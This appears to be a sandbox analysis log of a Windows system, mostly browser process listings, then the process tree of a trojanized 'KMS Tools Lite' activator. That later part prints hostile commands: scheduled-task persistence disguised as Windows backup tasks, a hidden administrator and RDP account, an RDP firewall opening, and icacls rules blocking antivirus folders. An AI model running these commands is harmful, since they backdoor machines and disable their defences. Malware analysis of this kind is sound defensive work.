  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=6948,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6944 /prefetch:1
  2⤵
  PID:1152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6964,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6960 /prefetch:1
  2⤵
  PID:404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6932,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6888 /prefetch:1
  2⤵
  PID:3800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6716,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:3392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7004,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7112 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=7204,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:5296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=7096,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7344 /prefetch:1
  2⤵
  PID:5312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=7520,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7368 /prefetch:1
  2⤵
  PID:5412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6724,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7652 /prefetch:1
  2⤵
  PID:5424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7820,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7840 /prefetch:1
  2⤵
  PID:5528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=7636,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7832 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7352,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8136 /prefetch:1
  2⤵
  PID:5640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=8212,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8228 /prefetch:1
  2⤵
  PID:5648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=8396,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8368 /prefetch:1
  2⤵
  PID:5748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6584,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6564 /prefetch:1
  2⤵
  PID:5972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6568,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6616 /prefetch:1
  2⤵
  PID:1824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=7624,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6560,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6580 /prefetch:8
  2⤵
  PID:5224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=5940,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6036 /prefetch:1
  2⤵
  PID:5304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=5436,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6272 /prefetch:1
  2⤵
  PID:5872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=7872,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=8432 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8356,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7728 /prefetch:8
  2⤵
  PID:5056

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3960

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x414 0x2f4
1⤵
PID:3136

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1464

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\MoveSelect.mp4"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3972

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Downloads\SplitMove.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff2ff846f8,0x7fff2ff84708,0x7fff2ff84718
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
  2⤵
  PID:1916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:8
  2⤵
  PID:5356
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,2288808513999804823,8323382944018843596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1744

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1360

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3852

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4200
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\MoveSelect.mp4
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3236

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\KMSTools\" -spe -an -ai#7zMap4420:78:7zEvent10125
1⤵
PID:2164

C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\KMSTools Lite.exe
"C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\KMSTools Lite.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5448
- C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\GSetup.exe
  "C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\GSetup.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:3272
- - C:\Windows\system32\cmd.exe
    "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y
    3⤵
    PID:5508
- - C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe
    "C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\Programs" "KMSoffline"*
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:1008
- - C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\Programs\KMSoffline\KMSoffline_x64.exe
    "C:\Users\Admin\Downloads\KMSTools\KMS Tools Lite Portable\Programs\KMSoffline\KMSoffline_x64.exe"
    3⤵
    - Executes dropped EXE
    PID:5440
- C:\ProgramData\Setup\install.exe
  C:\ProgramData\Setup\install.exe -palexpassword
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4804
- - C:\ProgramData\Setup\KMS.exe
    "C:\ProgramData\Setup\KMS.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Blocks application from running via registry modification
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetWindowsHookEx
    PID:5992
- - C:\ProgramData\Setup\update.exe
    "C:\ProgramData\Setup\update.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:244
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\CleanCash" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5472
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemSupport" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:648
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\RecoveryManager" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5304
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5592
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2292
  - - C:\ProgramData\Microsoft\win.exe
      C:\ProgramData\Microsoft\win.exe -ppidar
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2420
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\RecoveryManagerX\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\lfkQrvDcZb3\RecoveryManagerX.bat" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:3960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      4⤵
      PID:4364
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        5⤵
        
        PID:648
  - - C:\ProgramData\Setup\svchost.exe
      C:\ProgramData\Setup\svchost.exe -ppidar
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:432
    - - C:\ProgramData\Setup\IP.exe
        
        "C:\ProgramData\Setup\IP.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Adds Run key to start application
        Checks whether UAC is enabled
        Drops file in System32 directory
        Suspicious use of NtSetInformationThreadHideFromDebugger
        NTFS ADS
        Suspicious use of SetWindowsHookEx
        
        PID:2724
      - C:\Windows\SysWOW64\unsecapp.exe
        
        C:\Windows\SysWOW64\unsecapp.exe
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:2328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
        6⤵
        Drops file in Drivers directory
        
        PID:3148
    - - C:\ProgramData\Setup\smss.exe
        
        "C:\ProgramData\Setup\smss.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Program Files directory
        Checks processor information in registry
        Modifies registry class
        NTFS ADS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4312
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5932
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3540
      - C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5956
        
        C:\ProgramData\Windows Tasks Service\winserv.exe
        
        "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4604
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net user John 12345 /add
        6⤵
        
        PID:5208
        
        C:\Windows\system32\net.exe
        
        net user John 12345 /add
        7⤵
        
        PID:3216
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user John 12345 /add
        8⤵
        
        PID:4340
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
        6⤵
        
        PID:3420
        
        C:\Windows\system32\net.exe
        
        net localgroup "Администраторы" John /add
        7⤵
        
        PID:5880
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" John /add
        8⤵
        
        PID:4648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
        6⤵
        
        PID:1448
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        7⤵
        
        PID:5832
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        8⤵
        
        PID:5260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
        6⤵
        
        PID:1988
        
        C:\Windows\system32\net.exe
        
        net localgroup "Пользователи удаленного управления" john /add" John /add
        7⤵
        
        PID:5436
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
        8⤵
        
        PID:1168
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
        6⤵
        
        PID:2844
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administrators" John /add
        7⤵
        
        PID:5568
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        8⤵
        
        PID:672
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
        6⤵
        
        PID:2884
        
        C:\Windows\system32\net.exe
        
        net localgroup "Administradores" John /add
        7⤵
        
        PID:3512
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        8⤵
        
        PID:2072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
        6⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:5516
        
        C:\Windows\system32\net.exe
        
        net localgroup "Remote Desktop Users" john /add
        7⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:2444
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:5520
      - C:\ProgramData\RDPWinst.exe
        
        C:\ProgramData\RDPWinst.exe -i
        6⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:5384
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
        6⤵
        
        PID:5204
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1280
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        7⤵
        Delays execution with timeout.exe
        
        PID:1168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:372
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      PID:1172
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:3196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
      4⤵
      PID:5024
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5672
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
        5⤵
        Modifies file permissions
        
        PID:2720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      PID:2640
    - - C:\Windows\System32\Conhost.exe
        
